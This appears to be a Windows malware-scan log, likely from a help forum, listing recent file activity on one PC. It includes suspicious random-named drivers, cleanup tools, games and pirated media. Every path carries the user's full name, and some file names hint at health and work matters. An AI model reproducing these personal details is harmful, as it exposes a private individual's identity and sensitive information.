2015-10-08 21:47 - 2015-10-11 01:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Monument Builders - Golden Gate Bridge
2015-10-08 21:47 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monument Builders - Golden Gate Bridge
2015-10-08 21:47 - 2015-10-08 21:48 - 00000000 ____D C:\Program Files (x86)\Monument Builders - Golden Gate Bridge
2015-10-08 21:47 - 2015-10-08 21:47 - 00001963 _____ C:\Users\Public\Desktop\Play Sweetest Thing.lnk
2015-10-08 21:46 - 2015-10-11 01:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sweetest Thing
2015-10-08 21:46 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sweetest Thing
2015-10-08 21:46 - 2015-10-08 21:47 - 00000000 ____D C:\Program Files (x86)\Sweetest Thing
2015-10-08 20:46 - 2015-10-08 20:46 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\lrvcraza.sys
2015-10-05 17:18 - 2015-10-05 17:18 - 00433952 _____ C:\Users\christopher lane\Documents\Nicole CAG Florence September 2015.xls
2015-10-05 15:08 - 2015-10-05 15:08 - 00120832 _____ C:\Users\christopher lane\Desktop\Sept Schedule.xlsx
2015-10-05 14:51 - 2015-10-05 14:51 - 00353056 _____ C:\Users\christopher lane\Desktop\Copy of CAG Florence September 2015.xls
2015-10-04 15:46 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-09-29 19:19 - 2015-10-11 01:53 - 00003362 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForchristopher lane
2015-09-29 19:19 - 2015-10-04 15:12 - 00000376 _____ C:\WINDOWS\Tasks\HPCeeScheduleForchristopher lane.job
2015-09-28 19:22 - 2015-09-28 19:22 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pqmpvedg.sys
2015-09-28 19:09 - 2015-10-09 23:15 - 00000000 ____D C:\Users\christopher lane\AppData\Local\CrashDumps
2015-09-27 17:58 - 2015-09-27 18:42 - 00081696 _____ C:\Users\christopher lane\Desktop\1080 Medication Administration revised 09.15.xls
2015-09-27 17:58 - 2015-09-27 18:41 - 00082208 _____ C:\Users\christopher lane\Desktop\3140 MRSA.xls
2015-09-27 11:18 - 2015-09-27 11:18 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fmdqszsv.sys
2015-09-26 16:54 - 2015-09-26 16:54 - 00000000 ____D C:\Users\christopher lane\Documents\TheInnerWorld
2015-09-26 16:54 - 2015-09-26 16:54 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\com.studio-fizbin.InnerWorld
2015-09-26 07:27 - 2015-09-26 07:27 - 00002045 _____ C:\Users\Public\Desktop\Play Farm Frenzy - Heave Ho.lnk
2015-09-26 07:26 - 2015-10-11 01:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Farm Frenzy - Heave Ho
2015-09-26 07:26 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Farm Frenzy - Heave Ho
2015-09-26 07:26 - 2015-09-28 21:13 - 00000000 ____D C:\Program Files (x86)\Farm Frenzy - Heave Ho
2015-09-23 21:35 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-09-23 21:35 - 2015-09-23 21:35 - 00001753 _____ C:\Users\Public\Desktop\iTunes.lnk
2015-09-23 21:33 - 2015-09-23 21:35 - 00000000 ____D C:\Program Files\iTunes
2015-09-23 21:33 - 2015-09-23 21:33 - 00000000 ____D C:\Program Files\iPod
2015-09-23 21:33 - 2015-09-23 21:33 - 00000000 ____D C:\Program Files (x86)\iTunes
2015-09-23 21:30 - 2015-09-23 21:30 - 00000000 ____D C:\Program Files\Bonjour
2015-09-23 21:30 - 2015-09-23 21:30 - 00000000 ____D C:\Program Files (x86)\Bonjour
2015-09-23 21:29 - 2015-09-23 21:29 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2015-09-23 21:29 - 2015-09-23 21:29 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2015-09-23 21:24 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2015-09-23 21:24 - 2015-09-23 21:25 - 00000000 ____D C:\Program Files (x86)\QuickTime
2015-09-23 21:24 - 2015-09-23 21:24 - 00001845 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2015-09-21 20:54 - 2015-09-21 20:54 - 00000000 ____D C:\TDSSKiller_Quarantine
2015-09-21 20:52 - 2015-09-21 20:53 - 04404952 _____ (Kaspersky Lab ZAO) C:\Users\christopher lane\Downloads\tdsskiller (1).exe
2015-09-21 20:51 - 2015-09-21 20:51 - 04404952 _____ (Kaspersky Lab ZAO) C:\Users\christopher lane\Downloads\tdsskiller.exe
2015-09-21 01:39 - 2015-09-21 01:39 - 00000000 ____D C:\SUPERDelete
2015-09-21 01:16 - 2015-09-21 01:16 - 23445320 _____ (SUPERAntiSpyware) C:\Users\christopher lane\Downloads\SUPERAntiSpyware.exe
2015-09-21 01:16 - 2015-09-21 01:16 - 00000000 ____D C:\ProgramData\SUPERAntiSpyware.com
2015-09-21 01:12 - 2015-09-21 01:38 - 00000000 ____D C:\ProgramData\RogueKiller
2015-09-21 01:12 - 2015-09-21 01:12 - 00035064 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2015-09-21 01:11 - 2015-09-21 01:12 - 18780744 _____ C:\Users\christopher lane\Downloads\RogueKiller.exe
2015-09-21 00:19 - 2015-10-14 21:00 - 00000000 ____D C:\Users\christopher lane\Downloads\Elvis Presley – Greatest Hits (2012)[Mp3][www.lokotorrents.com]
2015-09-20 22:04 - 2015-09-28 21:20 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\FireFoxUpdServeis
2015-09-20 21:52 - 2015-10-14 21:00 - 00000000 ____D C:\Users\christopher lane\Documents\Wondershare Video Editor
2015-09-20 21:46 - 2015-10-14 21:02 - 00000000 ____D C:\Users\christopher lane\Downloads\Wondershare Video Editor 4.9.1.0 + Crack [KaranPC]
2015-09-20 21:44 - 2015-09-20 21:46 - 00000000 ____D C:\Users\christopher lane\Downloads\MAGIX Slideshow Maker
2015-09-20 21:42 - 2015-10-14 21:00 - 00000000 ____D C:\Users\christopher lane\Downloads\Slideshow
2015-09-20 20:33 - 2015-10-14 21:00 - 00000000 ____D C:\Users\christopher lane\Documents\Wondershare DVD Slideshow Builder Deluxe
2015-09-20 20:32 - 2015-10-14 21:02 - 00000000 ____D C:\Users\christopher lane\Downloads\Willie Nelson - The Very Best Of Willie Nelson (2008) - Country [www.torrentazos.com]
2015-09-20 20:18 - 2015-10-14 21:02 - 00000000 ____D C:\Users\christopher lane\Downloads\The Beach Boys - 50 Big Ones [2CD] [2012]
2015-09-20 20:10 - 2015-10-14 21:00 - 00000000 ____D C:\Users\christopher lane\Downloads\The Beach Boys
2015-09-20 20:08 - 2015-09-20 20:08 - 00000000 ____D C:\Users\christopher lane\Documents\My Smilebox Creations

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-16 20:54 - 2011-08-08 15:49 - 00004190 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6C4258D3-09E4-4B93-B6D1-495C3F5F883B}
2015-10-16 20:52 - 2015-08-27 23:38 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Dropbox
2015-10-16 20:52 - 2015-07-06 23:06 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Egyptian Settlement 2
2015-10-16 20:52 - 2015-07-01 21:14 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\GameHouse
2015-10-16 20:52 - 2015-06-07 00:25 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\BlamGames
2015-10-16 20:52 - 2015-05-06 20:53 - 00000000 ____D C:\Users\christopher lane\AppData\Local\0F93F772-12CD-4FC8-933A-3F0CB721F46D.aplzod
2015-10-16 20:52 - 2015-05-02 22:24 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Company
2015-10-16 20:52 - 2015-04-21 22:02 - 00000000 ____D C:\Users\christopher lane\AppData\Local\RapidSolution
2015-10-16 20:52 - 2015-03-29 22:06 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Absolutist
2015-10-16 20:52 - 2015-03-28 01:27 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Casual Arts
2015-10-16 20:52 - 2015-03-27 23:26 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Quirky Games Inc
2015-10-16 20:52 - 2015-01-22 21:56 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\HandBrake
2015-10-16 20:52 - 2014-12-14 12:39 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Blizzard Entertainment
2015-10-16 20:52 - 2014-12-14 12:39 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Battle.net
2015-10-16 20:52 - 2014-12-14 12:30 - 00000000 ____D C:\ProgramData\Battle.net
2015-10-16 20:52 - 2014-12-07 23:39 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\WendigoStudios
2015-10-16 20:52 - 2014-09-25 21:32 - 00000000 ____D C:\ProgramData\Cateia Games
2015-10-16 20:52 - 2014-09-01 21:05 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Realore_Whiterra Adelantado3
2015-10-16 20:52 - 2014-08-19 21:53 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\AlawarEntertainment
2015-10-16 20:52 - 2014-08-03 14:50 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\ERS Game Studios
2015-10-16 20:52 - 2014-07-28 21:32 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\LDW
2015-10-16 20:52 - 2014-07-27 20:19 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Realore
2015-10-16 20:52 - 2014-07-27 20:19 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Realore
2015-10-16 20:52 - 2014-07-19 23:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Playrix Entertainment
2015-10-16 20:52 - 2014-07-19 19:12 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Big Fish
2015-10-16 20:52 - 2013-01-18 13:26 - 00000000 ____D C:\ProgramData\GameTap Web Player
2015-10-16 20:52 - 2012-05-24 09:59 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Friday's games
2015-10-16 20:52 - 2012-01-24 16:10 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\MagicIndie
2015-10-16 20:52 - 2012-01-24 07:05 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Google
2015-10-16 20:52 - 2012-01-24 02:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Blue Tea Games
2015-10-16 20:52 - 2012-01-23 19:08 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Elephant Games
2015-10-16 20:52 - 2012-01-19 16:24 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Facebook
2015-10-16 20:52 - 2012-01-16 16:22 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Big Fish Games
2015-10-16 20:52 - 2012-01-10 08:51 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\BigFishGames
2015-10-16 20:52 - 2011-12-14 14:38 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\BitTorrent
2015-10-16 20:52 - 2011-12-09 09:00 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Conduit
2015-10-16 20:52 - 2011-10-14 12:46 - 00000000 ____D C:\ProgramData\Roxio
2015-10-16 20:52 - 2011-08-20 17:32 - 00000000 ____D C:\Users\christopher lane\AppData\Local\HP
2015-10-16 20:52 - 2011-08-12 20:00 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Adobe
2015-10-16 20:52 - 2011-08-11 17:57 - 00000000 ____D C:\Users\christopher lane\AppData\Local\CyberLink
2015-10-16 20:52 - 2011-08-08 18:16 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Microsoft Games
2015-10-16 20:52 - 2011-08-08 16:36 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Apple Computer
2015-10-16 20:52 - 2011-08-08 16:36 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Apple Computer
2015-10-16 20:52 - 2011-08-08 16:35 - 00000000 ____D C:\ProgramData\Apple Computer
2015-10-16 20:52 - 2011-08-08 15:59 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Adobe
2015-10-16 20:52 - 2011-08-08 15:57 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Skype
2015-10-16 20:52 - 2011-05-18 19:26 - 00000000 ____D C:\ProgramData\Adobe
2015-10-16 20:52 - 2011-05-18 19:20 - 00000000 ____D C:\ProgramData\Sonic
2015-10-16 20:48 - 2015-08-27 23:40 - 00000000 ___RD C:\Users\christopher lane\Dropbox
2015-10-16 20:47 - 2015-05-06 20:52 - 00000000 ___RD C:\Users\christopher lane\iCloudDrive
2015-10-16 20:47 - 2015-03-29 19:34 - 00000894 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-10-16 20:46 - 2015-08-27 23:38 - 00000924 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2015-10-16 20:45 - 2013-06-08 11:15 - 00000350 _____ C:\WINDOWS\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
2015-10-16 20:45 - 2011-07-18 19:47 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2015-10-16 20:44 - 2015-07-30 14:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-10-16 20:42 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\sru
2015-10-16 20:42 - 2015-07-10 02:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2015-10-16 20:25 - 2015-03-29 19:34 - 00000898 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-10-16 20:22 - 2012-01-19 16:24 - 00000972 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001UA.job
2015-10-16 20:08 - 2015-08-27 23:38 - 00000928 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2015-10-15 23:31 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-10-15 23:27 - 2015-02-22 01:45 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Ebmtion
2015-10-15 03:04 - 2012-04-06 18:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-10-14 21:31 - 2015-04-28 20:09 - 00000000 ____D C:\Users\christopher lane\Desktop\American Mobile
2015-10-14 21:00 - 2015-09-04 23:51 - 00000000 ____D C:\Users\christopher lane\Downloads\Pitch Perfect 2 (2015) 1080p WEBRip NL Subs SAM TBS
2015-10-14 21:00 - 2015-09-04 23:34 - 00000000 ____D C:\Users\christopher lane\Downloads\Pitch.Perfect.2.2015.HC.HDRip.XviD.AC3-EVO
2015-10-14 21:00 - 2015-05-10 17:16 - 00000000 ____D C:\Users\christopher lane\Downloads\Fifty Shades of Grey.2015.DVDRip.Jamie.Dornan.Full.Movie
2015-10-14 21:00 - 2015-04-28 21:46 - 00000000 ____D C:\Users\christopher lane\Downloads\Pink – Truth About Love 2012
2015-10-14 21:00 - 2015-04-28 21:38 - 00000000 ____D C:\Users\christopher lane\Downloads\A Thousand Years
2015-10-14 21:00 - 2015-04-16 20:19 - 00000000 ____D C:\Users\christopher lane\Downloads\Pink.The.Truth.About.Love.Tour.Live.From.Melbourne.2013.720p.MBluRay.x264-LiQUiD [PublicHD]
2015-10-14 21:00 - 2013-10-10 00:32 - 00000000 ____D C:\Users\christopher lane\Documents\My Received Files
2015-10-14 21:00 - 2011-12-09 14:47 - 00000000 ____D C:\Users\christopher lane\Documents\VIDEO_TS
2015-10-14 21:00 - 2011-08-11 17:57 - 00000000 ____D C:\Users\christopher lane\Documents\Youcam
2015-10-14 20:53 - 2015-08-18 23:00 - 00000000 ____D C:\Users\christopher lane\Documents\Electronic Arts
2015-10-14 20:53 - 2015-03-29 20:44 - 00000000 ____D C:\Users\christopher lane\Documents\Big Bang West 2
2015-10-14 20:53 - 2014-12-14 23:42 - 00000000 ____D C:\Users\christopher lane\Documents\Big Bang West
2015-10-14 20:53 - 2014-12-14 14:34 - 00000000 ____D C:\Users\christopher lane\Documents\Diablo III
2015-10-14 20:53 - 2014-11-30 20:18 - 00000000 ____D C:\Users\christopher lane\Documents\Coumadin
2015-10-14 20:53 - 2014-08-24 08:55 - 00000000 ____D C:\Users\christopher lane\Desktop\Pics
2015-10-14 20:53 - 2013-12-15 22:23 - 00000000 ____D C:\Users\christopher lane\Documents\2014 SCHEDULES
2015-10-14 20:53 - 2011-08-18 18:25 - 00000000 ____D C:\Users\christopher lane\Documents\CyberLink
2015-10-14 20:47 - 2014-09-07 12:25 - 00000000 ____D C:\Users\christopher lane\Desktop\Chris phone
2015-10-14 19:57 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-10-14 19:43 - 2015-02-22 01:44 - 00000000 ____D C:\Users\christopher lane\AppData\Local\ITsoft
2015-10-13 15:06 - 2015-07-30 15:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-10-13 15:03 - 2013-08-17 10:58 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-10-13 14:49 - 2011-08-08 15:57 - 143481208 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-10-13 14:47 - 2012-02-20 15:30 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-10-13 14:22 - 2012-01-19 16:24 - 00000950 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001Core.job
2015-10-13 13:51 - 2015-07-30 15:42 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2015-10-13 13:51 - 2015-07-30 15:42 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ___SD C:\WINDOWS\system32\F12
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\Provisioning
2015-10-13 13:50 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\L2Schemas
2015-10-13 13:49 - 2015-09-09 22:32 - 00001570 _____ C:\WINDOWS\PFRO.log
2015-10-13 13:49 - 2015-07-30 14:49 - 00335752 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-10-13 13:46 - 2011-05-18 19:32 - 00000000 ____D C:\ProgramData\Temp
2015-10-11 10:21 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\appcompat
2015-10-11 10:21 - 2015-07-30 14:50 - 00029126 _____ C:\WINDOWS\setupact.log
2015-10-11 10:19 - 2011-10-14 04:37 - 00630944 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\SynTP.sys
2015-10-11 10:19 - 2011-10-14 04:35 - 00770720 _____ (Synaptics Incorporated) C:\WINDOWS\system32\SynCOM.dll
2015-10-11 10:19 - 2011-10-14 04:35 - 00270496 _____ (Synaptics Incorporated) C:\WINDOWS\system32\SynTPAPI.dll
2015-10-11 02:27 - 2015-07-30 15:42 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2015-10-11 02:18 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-10-11 02:18 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-10-11 02:18 - 2015-07-09 22:13 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof
2015-10-11 02:18 - 2015-07-09 22:02 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2015-10-11 02:18 - 2015-07-09 20:36 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb
2015-10-11 02:18 - 2015-07-09 20:36 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb
2015-10-11 02:18 - 2015-07-09 20:36 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb
2015-10-11 02:18 - 2015-07-09 20:36 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb
2015-10-11 02:18 - 2015-07-09 20:36 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-10-11 02:18 - 2015-07-09 20:36 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-10-11 02:18 - 2015-07-09 20:36 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-10-11 02:18 - 2015-07-09 20:26 - 01417728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00813056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2015-10-11 02:18 - 2015-07-09 20:25 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2015-10-11 02:18 - 2015-07-09 20:25 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2015-10-11 02:18 - 2015-07-09 20:25 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2015-10-11 02:18 - 2015-07-09 20:25 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2015-10-11 02:18 - 2015-07-09 20:25 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2015-10-11 02:18 - 2015-07-09 20:25 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2015-10-11 02:18 - 2015-07-09 20:25 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-10-11 02:18 - 2015-07-09 20:25 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-10-11 02:18 - 2015-07-09 20:25 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-10-11 02:18 - 2015-07-09 20:20 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2015-10-11 02:15 - 2011-05-18 19:34 - 00000000 ____D C:\Program Files (x86)\Intel
2015-10-11 02:09 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\restore
2015-10-11 02:02 - 2015-07-30 14:50 - 00000178 _____ C:\WINDOWS\setuperr.log
2015-10-11 01:58 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\rescache
2015-10-11 01:54 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\Registration
2015-10-11 01:53 - 2015-09-05 00:09 - 00003506 _____ C:\WINDOWS\System32\Tasks\{52C5C532-AD6E-400C-9FA8-C8F3334D7162}
2015-10-11 01:53 - 2015-08-27 23:38 - 00004034 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2015-10-11 01:53 - 2015-08-27 23:38 - 00003782 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2015-10-11 01:53 - 2015-07-30 15:42 - 00000000 __RSD C:\WINDOWS\Media
2015-10-11 01:53 - 2015-07-30 15:42 - 00000000 __RHD C:\Users\Public\Libraries
2015-10-11 01:53 - 2015-05-16 08:40 - 00003996 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2015-10-11 01:53 - 2015-03-29 19:34 - 00004004 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-10-11 01:53 - 2015-03-29 19:34 - 00003752 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-10-11 01:53 - 2015-03-27 21:01 - 00003648 _____ C:\WINDOWS\System32\Tasks\AdobeAAMUpdater-1.0-christopherlane-christopher lane
2015-10-11 01:53 - 2013-10-10 00:23 - 00004108 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{803C768E-6628-4490-B722-BC824761D433}
2015-10-11 01:53 - 2013-06-08 11:15 - 00002964 _____ C:\WINDOWS\System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv
2015-10-11 01:53 - 2012-07-24 16:27 - 00003382 _____ C:\WINDOWS\System32\Tasks\SidebarExecute
2015-10-11 01:53 - 2012-05-16 16:48 - 00003502 _____ C:\WINDOWS\System32\Tasks\{CCF13946-4492-437B-ADDD-F2E55FB7962B}
2015-10-11 01:53 - 2012-05-16 16:44 - 00003364 _____ C:\WINDOWS\System32\Tasks\{DA1A727E-2202-41C7-BA20-005F6EB09038}
2015-10-11 01:53 - 2012-04-06 18:26 - 00003878 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-10-11 01:53 - 2012-01-19 16:24 - 00004080 _____ C:\WINDOWS\System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001UA
2015-10-11 01:53 - 2012-01-19 16:24 - 00003712 _____ C:\WINDOWS\System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001Core
2015-10-11 01:53 - 2011-10-14 12:47 - 00003192 _____ C:\WINDOWS\System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe
2015-10-11 01:53 - 2011-08-14 08:44 - 00004108 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{BA0B9772-35F9-4C03-A97B-3D9555B0C885}
2015-10-11 01:53 - 2011-08-08 15:49 - 00003896 _____ C:\WINDOWS\System32\Tasks\Registration
2015-10-11 01:53 - 2011-07-18 20:00 - 00003258 _____ C:\WINDOWS\System32\Tasks\MirageAgent
2015-10-11 01:46 - 2015-09-09 22:19 - 00000000 ____D C:\WINDOWS\ShellNew
2015-10-11 01:46 - 2015-09-07 21:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movavi Video Converter 15
2015-10-11 01:46 - 2015-07-30 15:42 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:46 - 2015-07-26 22:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Farm Frenzy Inc
2015-10-11 01:46 - 2015-07-10 02:05 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2015-10-11 01:46 - 2015-05-06 19:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2015-10-11 01:46 - 2015-05-02 22:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solid YouTube Downloader and Converter
2015-10-11 01:46 - 2015-03-29 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
